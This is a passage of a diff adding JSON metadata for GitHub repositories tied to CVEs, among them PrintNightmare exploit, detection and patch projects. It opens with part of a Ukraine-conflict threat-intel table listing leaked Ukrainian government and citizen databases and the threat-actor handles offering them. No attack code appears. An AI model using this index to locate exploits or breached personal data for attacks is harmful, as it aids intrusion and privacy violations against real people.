PII DB (28M) of Ukrainian citizens (passports, drivers licenses, photos)                                  | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| CorelDraw       | UA data sharing | PII DB (1M) of Ukrainian postal\/courier service customers (novaposhta\\[.\\]ua)                             | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| CorelDraw       | UA data sharing | PII DB (10M) of Ukrainian telecom customers (vodafone\\[.\\]ua)                                             | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| CorelDraw       | UA data sharing | PII DB (3M) of Ukrainian telecom customers (lifecell\\[.\\]ua)                                              | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| CorelDraw       | UA data sharing | PII DB (13M) of Ukrainian telecom customers (kyivstar\\[.\\]ua)                                             | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| danieltx51      | UA data sharing | DB of Ministry of Foreign Affairs of Ukraine (mfa\\[.\\]gov\\[.\\]ua)                                         | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| DueDiligenceCIS | UA data sharing | PII DB (63M) of Ukrainian citizens (name, DOB, birth country, phone, TIN, passport, family, etc)          | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| Featherine      | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine              | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| FreeCivilian    | UA data sharing | DB of Ministry for Internal Affairs of Ukraine public data search engine (wanted\\[.\\]mvs\\[.\\]gov\\[.\\]ua)  | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| FreeCivilian    | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion\\[.\\]gov\\[.\\]ua)          | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| FreeCivilian    | UA data sharing | DB of Motor Insurance Bureau of Ukraine (mtsbu\\[.\\]ua)                                                    | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| FreeCivilian    | UA data sharing | PII DB of Ukrainian digital-medicine provider (medstar\\[.\\]ua)                                            | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| FreeCivilian    | UA data sharing | DB of ticket.kyivcity.gov.ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of id.kyivcity.gov.ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of my.kyivcity.gov.ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of portal.kyivcity.gov.ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of anti-violence-map.msp.gov.ua                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of dopomoga.msp.gov.ua                                                                                 | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of e-services.msp.gov.ua                                                                               | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of edu.msp.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of education.msp.gov.ua                                                                                | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of ek-cbi.msp.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mail.msp.gov.ua                                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of portal-gromady.msp.gov.ua                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of web-minsoc.msp.gov.ua                                                                               | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of wcs-wim.dsbt.gov.ua                                                                                 | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of bdr.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of motorsich.com                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of dsns.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mon.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of minagro.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of zt.gov.ua                                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of kmu.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mvs.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of dsbt.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of forest.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of nkrzi.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of dabi.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of comin.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of dp.dpss.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of esbu.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mms.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mova.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mspu.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of nads.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of reintegration.gov.ua                                                                                | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of sies.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of sport.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mepr.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mfa.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of va.gov.ua                                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mtu.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of cg.mvs.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of ch-tmo.mvs.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of cp.mvs.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of cpd.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of hutirvilnij-mrc.mvs.gov.ua                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of dndekc.mvs.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of visnyk.dndekc.mvs.gov.ua                                                                            | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of dpvs.hsc.gov.ua                                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of odk.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of e-driver\\[.\\]hsc\\[.\\]gov\\[.\\]ua                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of wanted\\[.\\]mvs\\[.\\]gov\\[.\\]ua                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of minregeion\\[.\\]gov\\[.\\]ua                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of health\\[.\\]mia\\[.\\]solutions                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mtsbu\\[.\\]ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of motorsich\\[.\\]com                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of kyivcity\\[.\\]com                                                                                    | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of bdr\\[.\\]mvs\\[.\\]gov\\[.\\]ua                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of gkh\\[.\\]in\\[.\\]ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of kmu\\[.\\]gov\\[.\\]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mon\\[.\\]gov\\[.\\]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of minagro\\[.\\]gov\\[.\\]ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| FreeCivilian    | UA data sharing | DB of mfa\\[.\\]gov\\[.\\]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\]                         | ​| Intel\\_Data     | UA data sharing | PII DB (56M) of Ukrainian Citizens                                                                        | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| Kristina        | UA data sharing | DB of Ukrainian National Police (mvs\\[.\\]gov\\[.\\]ua)                                                      | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| NetSec          | UA data sharing | PII DB (53M) of Ukrainian citizens                                                                        | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| Psycho\\_Killer  | UA data sharing | PII DB (56M) of Ukrainian Citizens                                                                        | No        | TA discussion in past 90 days | Exploit Forum .onion \\[not linked\\]                        | ​| Sp333           | UA data sharing | PII DB of Ukrainian and Russian interpreters, translators, and tour guides                                | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| Vaticano        | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine \\[copy\\]     | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| Vaticano        | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion\\[.\\]gov\\[.\\]ua) \\[copy\\] | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​####​ ​`Vendor Support` ​| Vendor | Offering | URL | ​| --- | --- | --- | ​| Dragos | Access to Dragos service if from US\/UK\/ANZ and in need of ICS cybersecurity support | [twitter.com\/RobertMLee](https:\/\/twitter.com\/RobertMLee\/status\/1496862093588455429) | ​| GreyNoise |  Any and all `Ukrainian` emails registered to GreyNoise have been upgraded to VIP which includes full, uncapped enterprise access to all GreyNoise products | [twitter.com\/Andrew___Morris](https:\/\/twitter.com\/Andrew___Morris\/status\/1496923545712091139) | ​| Recorded Future | Providing free intelligence-driven insights, perspectives, and mitigation strategies as the situation in Ukraine evolves| [recordedfuture.com](https:\/\/www.recordedfuture.com\/ukraine\/) | ​| Flashpoint | Free Access to Flashpoint’s Latest Threat Intel on Ukraine | [go.flashpoint-intel.com](https:\/\/go.flashpoint-intel.com\/trial\/access\/30days) | ​| ThreatABLE | A Ukraine tag for free threat intelligence feed that's more highly curated to cyber| [twitter.com\/threatable](https:\/\/twitter.com\/threatable\/status\/1497233721803644950) | ​| Orange | IOCs related to Russia-Ukraine 2022 conflict extracted from our Datalake Threat Intelligence platform. | [github.com\/Orange-Cyberdefense](https:\/\/github.com\/Orange-Cyberdefense\/russia-ukraine_IOCs)| ​| FSecure | F-Secure FREEDOME VPN is now available for free in all of Ukraine | [twitter.com\/FSecure](https:\/\/twitter.com\/FSecure\/status\/1497248407303462960) | ​| Multiple vendors | List of vendors offering their services to Ukraine for free, put together by [@chrisculling](https:\/\/twitter.com\/chrisculling\/status\/1497023038323404803) | [docs.google.com\/spreadsheets](https:\/\/docs.google.com\/spreadsheets\/d\/18WYY9p1_DLwB6dnXoiiOAoWYD8X0voXtoDl_ZQzjzUQ\/edit#gid=0) | ​| Mandiant | Free threat intelligence, webinar and guidance for defensive measures relevant to the situation in Ukraine. | [mandiant.com](https:\/\/www.mandiant.com\/resources\/insights\/ukraine-crisis-resource-center) | ​| Starlink | Satellite internet constellation operated by SpaceX providing satellite Internet access coverage to Ukraine | [twitter.com\/elonmusk](https:\/\/twitter.com\/elonmusk\/status\/1497701484003213317) | ​| Romania DNSC | Romania’s DNSC – in partnership with Bitdefender – will provide technical consulting, threat intelligence and, free of charge, cybersecurity technology to any business, government institution or private citizen of Ukraine for as long as it is necessary. | [Romania's DNSC Press Release](https:\/\/dnsc.ro\/citeste\/press-release-dnsc-and-bitdefender-work-together-in-support-of-ukraine)| ​| BitDefender | Access to Bitdefender technical consulting, threat intelligence and both consumer and enterprise cybersecurity technology | [bitdefender.com\/ukraine\/](https:\/\/www.bitdefender.com\/ukraine\/) | ​| NameCheap | Free anonymous hosting and domain name registration to any anti-Putin anti-regime and protest websites for anyone located within Russia and Belarus | [twitter.com\/Namecheap](https:\/\/twitter.com\/Namecheap\/status\/1498998414020861953) | ​| Avast | Free decryptor for PartyTicket ransomware | [decoded.avast.io](https:\/\/decoded.avast.io\/threatresearch\/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware\/) |  ​####​ ​`Vetted OSINT Sources` ​| Handle | Affiliation | ​| --- | --- | ​| [@KyivIndependent](https:\/\/twitter.com\/KyivIndependent) | English-language journalism in Ukraine | ​| [@IAPonomarenko](https:\/\/twitter.com\/IAPonomarenko) | Defense reporter with The Kyiv Independent | ​| [@KyivPost](https:\/\/twitter.com\/KyivPost) | English-language journalism in Ukraine | ​| [@Shayan86](https:\/\/twitter.com\/Shayan86) | BBC World News Disinformation journalist | ​| [@Liveuamap](https:\/\/twitter.com\/Liveuamap) | Live Universal Awareness Map (“Liveuamap”) independent global news and information site | ​| [@DAlperovitch](https:\/\/twitter.com\/DAlperovitch) | The Alperovitch Institute for Cybersecurity Studies, Founder & Former CTO of CrowdStrike | ​| [@COUPSURE](https:\/\/twitter.com\/COUPSURE) | OSINT investigator for Centre for Information Resilience | ​| [@netblocks](https:\/\/twitter.com\/netblocks) | London-based Internet's Observatory | ​####​ ​`Miscellaneous Resources` ​| Source | URL | Content | ​| --- | --- | --- | ​| PowerOutages.com | https:\/\/poweroutage.com\/ua | Tracking PowerOutages across Ukraine | ​| Monash IP Observatory | https:\/\/twitter.com\/IP_Observatory | Tracking IP address outages across Ukraine | ​| Project Owl Discord | https:\/\/discord.com\/invite\/projectowl | Tracking foreign policy, geopolitical events, military and governments, using a Discord-based crowdsourced approach, with a current emphasis on Ukraine and Russia | ​| russianwarchatter.info | https:\/\/www.russianwarchatter.info\/ | Known Russian Military Radio Frequencies |", + "fork": false, + "created_at": "2022-03-04T09:00:59Z", + "updated_at": "2024-11-13T18:31:51Z", + "pushed_at": "2022-03-04T09:03:14Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 16, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1647.json b/2021/CVE-2021-1647.json new file mode 100644 index 0000000000..9055c5933b --- /dev/null +++ b/2021/CVE-2021-1647.json @@ -0,0 +1,33 @@ +[ + { + "id": 332213147, + "name": "cve-2021-1647", + "full_name": "findcool\/cve-2021-1647", + "owner": { + "login": "findcool", + "id": 73280456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73280456?v=4", + "html_url": "https:\/\/github.com\/findcool", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/findcool\/cve-2021-1647", + "description": null, + "fork": false, + "created_at": "2021-01-23T13:10:35Z", + "updated_at": "2024-10-15T16:58:00Z", + "pushed_at": "2021-01-20T14:55:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1656.json b/2021/CVE-2021-1656.json new file mode 100644 index 0000000000..46c11f02e3 --- /dev/null +++ b/2021/CVE-2021-1656.json @@ -0,0 +1,33 @@ +[ + { + "id": 352879385, + "name": "CVE-2021-1656", + "full_name": "waleedassar\/CVE-2021-1656", + "owner": { + "login": "waleedassar", + "id": 5983995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5983995?v=4", + "html_url": "https:\/\/github.com\/waleedassar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/waleedassar\/CVE-2021-1656", + "description": null, + "fork": false, + "created_at": "2021-03-30T05:21:26Z", + "updated_at": "2024-08-12T20:11:40Z", + "pushed_at": "2021-03-30T05:31:22Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 22, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1675.json b/2021/CVE-2021-1675.json new file mode 100644 index 0000000000..e8d496b270 --- /dev/null +++ b/2021/CVE-2021-1675.json @@ -0,0 +1,1398 @@ +[ + { + "id": 381392691, + "name": "CVE-2021-1675", + "full_name": "yu2u\/CVE-2021-1675", + "owner": { + "login": "yu2u", + "id": 25322880, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25322880?v=4", + "html_url": "https:\/\/github.com\/yu2u", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yu2u\/CVE-2021-1675", + "description": "CVE-2021-1675 exploit", + "fork": false, + "created_at": "2021-06-29T14:24:30Z", + "updated_at": "2021-09-15T02:02:40Z", + "pushed_at": "2021-06-29T14:26:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 381444656, + "name": "CVE-2021-1675", + "full_name": "cube0x0\/CVE-2021-1675", + "owner": { + "login": "cube0x0", + "id": 39370848, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39370848?v=4", + "html_url": "https:\/\/github.com\/cube0x0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cube0x0\/CVE-2021-1675", + "description": "C# and Impacket implementation of PrintNightmare CVE-2021-1675\/CVE-2021-34527", + "fork": false, + "created_at": "2021-06-29T17:24:14Z", + "updated_at": "2024-11-28T13:43:18Z", + "pushed_at": "2021-07-20T15:28:13Z", + "stargazers_count": 1843, + "watchers_count": 1843, + "has_discussions": false, + "forks_count": 583, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 583, + "watchers": 1843, + "score": 0, + "subscribers_count": 43 + }, + { + "id": 381799016, + "name": "CVE-2021-1675", + "full_name": "LaresLLC\/CVE-2021-1675", + "owner": { + "login": "LaresLLC", + "id": 63059624, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63059624?v=4", + "html_url": "https:\/\/github.com\/LaresLLC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LaresLLC\/CVE-2021-1675", + "description": "CVE-2021-1675 Detection Info", + "fork": false, + "created_at": "2021-06-30T18:32:17Z", + "updated_at": "2024-11-23T01:35:32Z", + "pushed_at": "2023-05-20T01:53:16Z", + "stargazers_count": 215, + "watchers_count": 215, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 215, + "score": 0, + "subscribers_count": 19 + }, + { + "id": 381858715, + "name": "patch-cve-2021-1675", + "full_name": "kondah\/patch-cve-2021-1675", + "owner": { + "login": "kondah", + "id": 7760108, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7760108?v=4", + "html_url": "https:\/\/github.com\/kondah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kondah\/patch-cve-2021-1675", + "description": null, + "fork": false, + "created_at": "2021-06-30T23:39:21Z", + "updated_at": "2024-08-12T20:14:21Z", + "pushed_at": "2021-06-30T23:40:44Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 381971547, + "name": "CVE-2021-1675-LPE-EXP", + "full_name": "evilashz\/CVE-2021-1675-LPE-EXP", + "owner": { + "login": "evilashz", + "id": 50722929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50722929?v=4", + "html_url": "https:\/\/github.com\/evilashz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/evilashz\/CVE-2021-1675-LPE-EXP", + "description": "PrintNightmare , Local Privilege Escalation of CVE-2021-1675 or CVE-2021-34527", + "fork": false, + "created_at": "2021-07-01T09:00:31Z", + "updated_at": "2024-10-20T23:32:23Z", + "pushed_at": "2021-07-02T10:47:36Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-1675", + "cve-2021-34527", + "hacktool", + "lpe", + "printnightmare", + "redteam", + "redteam-tools", + "windows" + ], + "visibility": "public", + "forks": 21, + "watchers": 58, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 381984439, + "name": "CVE-2021-1675-LPE", + "full_name": "hlldz\/CVE-2021-1675-LPE", + "owner": { + "login": "hlldz", + "id": 16455559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16455559?v=4", + "html_url": "https:\/\/github.com\/hlldz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hlldz\/CVE-2021-1675-LPE", + "description": "Local Privilege Escalation Edition for CVE-2021-1675\/CVE-2021-34527", + "fork": false, + "created_at": "2021-07-01T09:47:13Z", + "updated_at": "2024-09-19T12:06:30Z", + "pushed_at": "2021-07-05T06:46:12Z", + "stargazers_count": 330, + "watchers_count": 330, + "has_discussions": false, + "forks_count": 79, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cobaltstrike", + "cve-2021-1675", + "cve-2021-34527", + "exploit", + "lpe", + "printnightmare", + "reflectivedll", + "windows" + ], + "visibility": "public", + "forks": 79, + "watchers": 330, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 382024474, + "name": "CVE-2021-1675", + "full_name": "puckiestyle\/CVE-2021-1675", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2021-1675", + "description": null, + "fork": false, + "created_at": "2021-07-01T12:24:19Z", + "updated_at": "2024-08-12T20:14:22Z", + "pushed_at": "2021-10-31T15:29:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382050919, + "name": "CVE-2021-1675_PrintNightMare", + "full_name": "cybersecurityworks553\/CVE-2021-1675_PrintNightMare", + "owner": { + "login": "cybersecurityworks553", + "id": 63910792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63910792?v=4", + "html_url": "https:\/\/github.com\/cybersecurityworks553", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cybersecurityworks553\/CVE-2021-1675_PrintNightMare", + "description": null, + "fork": false, + "created_at": "2021-07-01T13:58:01Z", + "updated_at": "2024-08-12T20:14:22Z", + "pushed_at": "2021-11-18T16:46:46Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382141130, + "name": "CVE-2021-1675", + "full_name": "tanarchytan\/CVE-2021-1675", + "owner": { + "login": "tanarchytan", + "id": 2339027, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2339027?v=4", + "html_url": "https:\/\/github.com\/tanarchytan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tanarchytan\/CVE-2021-1675", + "description": "Fix without disabling Print Spooler", + "fork": false, + "created_at": "2021-07-01T19:50:46Z", + "updated_at": "2024-08-12T20:14:23Z", + "pushed_at": "2021-07-02T04:32:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382182179, + "name": "CVE-2021-1675", + "full_name": "calebstewart\/CVE-2021-1675", + "owner": { + "login": "calebstewart", + "id": 7529189, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7529189?v=4", + "html_url": "https:\/\/github.com\/calebstewart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/calebstewart\/CVE-2021-1675", + "description": "Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)", + "fork": false, + "created_at": "2021-07-01T23:45:58Z", + "updated_at": "2024-11-28T15:16:26Z", + "pushed_at": "2021-07-05T08:54:06Z", + "stargazers_count": 1017, + "watchers_count": 1017, + "has_discussions": false, + "forks_count": 230, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 230, + "watchers": 1017, + "score": 0, + "subscribers_count": 26 + }, + { + "id": 382200984, + "name": "CVE-2021-1675-SCANNER", + "full_name": "Leonidus0x10\/CVE-2021-1675-SCANNER", + "owner": { + "login": "Leonidus0x10", + "id": 72128281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72128281?v=4", + "html_url": "https:\/\/github.com\/Leonidus0x10", + "user_view_type": "public" + }, + "html_url": 